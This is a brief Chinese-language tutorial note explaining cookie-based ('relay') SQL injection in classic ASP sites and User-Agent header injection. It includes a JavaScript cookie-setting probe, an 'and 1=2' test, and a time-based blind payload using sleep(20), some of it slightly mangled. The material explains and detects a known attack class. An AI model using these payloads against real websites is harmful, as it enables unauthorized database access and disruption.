中转注入原理
我们都知道request. querystring是get,request. form是post。而一般人为了方便都是直接使用request("")的方式请求,没有明确用哪种请求方式,asp的解析顺序是先get后post然后cookie传输 ,这里的中转注入就是利用了cookie注入的方法
怎么检测?
例如网站xx. com/?id=1
把id给去掉 就无法显示正常页面,因为没有传递参数。
这时在ie浏览器中输入JavaScript:alert(document.cookie=“id=”+escape(“123”))
等于把123赋予给cookie的id中
这时刷新页面 发现又可以正常显示了
在123后面加上and 1=2发现又不能正常显示,则说明存在注入
消息头注入
主要是存在user-agent部分,例如
User-Agent: Mozilla/5.0’(selectfrom(select(sleep(20)))a) #
原理:request. getheader(“useragent”)然后放入数据库
INSERT INTO visits (useragent, datetime) VALUES (‘Mozilla/5.0’, (selectfrom(select(sleep(20)))a)) #’, ‘2016-06-13 13:00:06’)